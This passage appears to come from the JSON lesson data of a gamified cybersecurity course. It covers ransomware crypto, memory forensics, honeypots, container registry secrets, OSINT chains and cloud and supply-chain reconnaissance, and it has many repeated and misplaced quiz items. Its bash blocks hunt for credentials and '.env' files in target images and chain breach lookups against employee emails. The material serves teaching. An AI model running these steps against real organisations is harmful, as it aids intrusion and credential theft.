processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"X-Forwarded-For bypasses rate limiting when the server...","opts":["Ignores it","Trusts it as the client IP instead of the real source","Logs it","Encrypts it"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Evidence integrity is verified using...","opts":["File size comparison","Cryptographic hash comparison","Visual inspection","File name matching"],"ans":1},{"type":"quiz","q":"Malware sandboxing means...","opts":["Deleting malware","Running it in an isolated environment to observe behavior","Encrypting it","Reverse engineering"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"crypto-ransomware-crypto","cat":"Cryptography","title":"How Ransomware Encryption Works","diff":2,"xp":150,"intro":"Understand the crypto to know when decryption is possible.","sections":[{"type":"text","content":"Good ransomware: generates a random AES key per file, encrypts the AES key with the attacker's RSA public key. Only the attacker's private key can recover the AES keys. Bad ransomware: reuses keys, uses weak crypto, or stores keys locally."},{"type":"code","lang":"bash","content":"# Ransomware crypto flow:\n# 1. Generate random AES-256 key per file (or per session)\n# 2. Encrypt file contents with AES\n# 3. Encrypt the AES key with attacker's RSA-2048 public key\n# 4. Append encrypted AES key to the file\n# 5. Delete original + AES key from memory\n\n# When decryption IS possible:\n# - Weak/reused encryption keys\n# - Key stored in memory (not wiped)\n# - Implementation bugs (wrong mode, bad IV)\n# - Key stored in a file/registry\n# - Attacker's server seized (keys recovered)"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"Free ransomware decryptors exist when...","opts":["The ransom is paid","The encryption implementation has bugs or reused keys","The FBI intervenes","The files are small"],"ans":1},{"type":"quiz","q":"A DMZ is...","opts":["A type of encryption","A network zone between internal and external networks","A user group","A firewall brand"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"forensics-memory-strings","cat":"Forensics & IR","title":"Memory Forensics: Finding Strings and Credentials","diff":1,"xp":100,"intro":"RAM contains cleartext passwords, commands, and URLs the disk never saw.","sections":[{"type":"text","content":"Strings in memory reveal: typed commands, clipboard contents, URLs visited, cleartext credentials (WDigest), decrypted file contents, and chat messages."},{"type":"code","lang":"bash","content":"# Extract strings from a memory dump\nstrings -a memory.raw | grep -iE 'password|passwd|secret|token' | sort -u | head -20\n\n# Volatility: extract command history\nvol.py -f memory.dmp --profile=Win10x64 consoles\nvol.py -f memory.dmp --profile=Win10x64 cmdscan\n\n# Extract clipboard\nvol.py -f memory.dmp --profile=Win10x64 clipboard\n\n# Dump process memory for specific strings\nvol.py -f memory.dmp --profile=Win10x64 memdump -p 1234 -D output/\nstrings output/1234.dmp | grep -i password"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Credentials can be found in RAM because...","opts":["They're always encrypted","Programs hold them in cleartext for use","RAM is persistent","The OS requires it"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"defense-honeypot-design","cat":"Defense & Blue Team","title":"Designing Effective Honeypots","diff":2,"xp":150,"intro":"Build deception that actually detects attackers, not just collects dust.","sections":[{"type":"text","content":"Effective honeypots: look real (real services, realistic data), are positioned where attackers would look (admin shares, database servers), generate high-fidelity alerts (any interaction = suspicious), and don't affect production."},{"type":"code","lang":"bash","content":"# Layers of deception:\n# 1. Network honeypots: unused IPs running SSH, SMB, HTTP\n#    Any connection = attacker (or misconfigured device)\n# 2. Credential traps: fake creds in LSASS, browser storage\n#    Usage = attacker harvested and tried them\n# 3. File traps: fake documents in network shares\n#    Open = attacker browsing for data\n# 4. DNS traps: fake internal hostnames\n#    Resolution = attacker enumerating DNS\n# 5. Token traps: AWS keys, API tokens that alert on use\n#    Any API call = attacker found and used them"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"The best honeypot indicator is...","opts":["High traffic","ANY interaction (zero false positive by design)","Complex logs","Multiple protocols"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"cloud-container-registry","cat":"Cloud & Container","title":"Container Registry Security","diff":1,"xp":100,"intro":"Public registries leak secrets. Private registries need access control.","sections":[{"type":"text","content":"Docker images contain everything: source code, config files, environment variables, and sometimes hardcoded credentials. A public registry = full source code disclosure."},{"type":"code","lang":"bash","content":"# Check if a registry is public\ncurl -s https://registry.target.com/v2/_catalog\n\n# Pull and inspect images\ndocker pull registry.target.com/app:latest\n\n# Extract secrets from image layers\ndocker history registry.target.com/app:latest --no-trunc\ndocker inspect registry.target.com/app:latest | jq '.[0].Config.Env'\n\n# Dive: inspect layers for secrets\ndive registry.target.com/app:latest\n\n# Search for secrets in the filesystem\ndocker run --rm -it registry.target.com/app:latest find / -name '*.env' -o -name 'credentials' 2>/dev/null"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"Docker image layers can leak...","opts":["Network topology","Hardcoded secrets and source code","Kernel version","RAM contents"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"recon-osint-framework","cat":"Reconnaissance","title":"OSINT Framework Deep Dive","diff":3,"xp":250,"intro":"Chain multiple OSINT sources to build a complete target profile from nothing.","sections":[{"type":"text","content":"Real OSINT isn't one tool \u2014 it's a chain: LinkedIn reveals employees, employees reveal tech stack from job postings, tech stack reveals attack surface, GitHub repos leak secrets, breached databases confirm credentials. Each finding feeds the next."},{"type":"code","lang":"bash","content":"# Full OSINT chain:\n# 1. Company -> employees\nlinkedin2username -c 'Target Corp' -n 'target.com'\n# 2. Employees -> email format\nhunter.io / email-format.com\n# 3. Emails -> credential breaches\nh8mail -t user@target.com\n# 4. Employee GitHub -> leaked secrets\ngitrob -org targetcorp\ntrufflehog github --org targetcorp\n# 5. Tech stack -> CVEs\n# Job posting: 'Experience with Apache Struts 2.x required'\nsearchsploit apache struts 2"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Why chain OSINT findings?","opts":["Each finding unlocks new attack vectors","It's required by law","One tool is enough","To generate more data"],"ans":0},{"type":"quiz","q":"What can breached credential databases reveal?","opts":["Server locations","Password patterns and reused credentials","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"Why are job postings valuable for recon?","opts":["They list salaries","They reveal the tech stack and tools used internally","They show office locations","They list employee names"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"recon-cloud-asset-discovery","cat":"Reconnaissance","title":"Cloud Asset Discovery & Shadow IT","diff":3,"xp":250,"intro":"Find cloud resources the target doesn't know they're exposing.","sections":[{"type":"text","content":"Organizations lose track of cloud assets: forgotten S3 buckets, dev EC2 instances, old Azure apps. Certificate transparency, DNS brute-forcing, and cloud-specific enumeration find what the target forgot about."},{"type":"code","lang":"bash","content":"# Certificate Transparency for cloud subdomains\ncurl -s 'https://crt.sh/?q=%25.target.com&output=json' | jq -r '.[].name_value' | sort -u | grep -E 'dev|stag|test|api|admin|internal'\n# Cloud-specific DNS patterns\nfor prefix in dev staging test api admin internal prod backup; do\n  for cloud in s3.amazonaws.com blob.core.windows.net storage.googleapis.com; do\n    dig +short $prefix-target.$cloud\n  done\ndone\n# AWS account ID enumeration (from S3 bucket)\naws s3api get-bucket-acl --bucket target-backup --no-sign-request 2>&1"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Shadow IT refers to...","opts":["Official servers","Cloud resources the organization has lost track of","On-premise hardware","Licensed software"],"ans":1},{"type":"quiz","q":"Certificate transparency helps find shadow IT because...","opts":["It blocks certificates","Every issued SSL cert is publicly logged","It encrypts traffic","It lists IP addresses"],"ans":1},{"type":"quiz","q":"Why are dev/staging environments high-value targets?","opts":["They're faster","They often have weaker security than production","They have more data","They're newer"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"recon-supply-chain-mapping","cat":"Reconnaissance","title":"Supply Chain Attack Surface Mapping","diff":3,"xp":300,"intro":"Map third-party dependencies and vendors to find indirect attack paths.","sections":[{"type":"text","content":"You don't always attack the target directly. Map their vendors, SaaS tools, open-source dependencies, and CDN providers. Compromise a dependency and you compromise every user of it \u2014 SolarWinds, Log4j, and codecov proved this."},{"type":"code","lang":"bash","content":"# Map JavaScript dependencies (CDN includes)\ncurl -s https://target.com | grep -oP 'src=\"https?://[^\"]+.js' | sort -u\n# Check for known vulnerable JS libraries\nretire.js --jspath /path/to/target/js/\n# Map DNS to find CDN/SaaS providers\ndig target.com +short  # Cloudflare? AWS? Akamai?\n# Check package.json / requirements.txt in public repos\ncurl -s https://raw.githubusercontent.com/targetorg/app/main/package.json | jq '.dependencies'\n# Check npm audit for known vulns\nnpm audit --json"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"The SolarWinds attack compromised targets by...","opts":["Direct exploitation","Poisoning a trusted software update (supply chain)","Phishing","Brute force"],"ans":1},{"type":"quiz","q":"retire.js 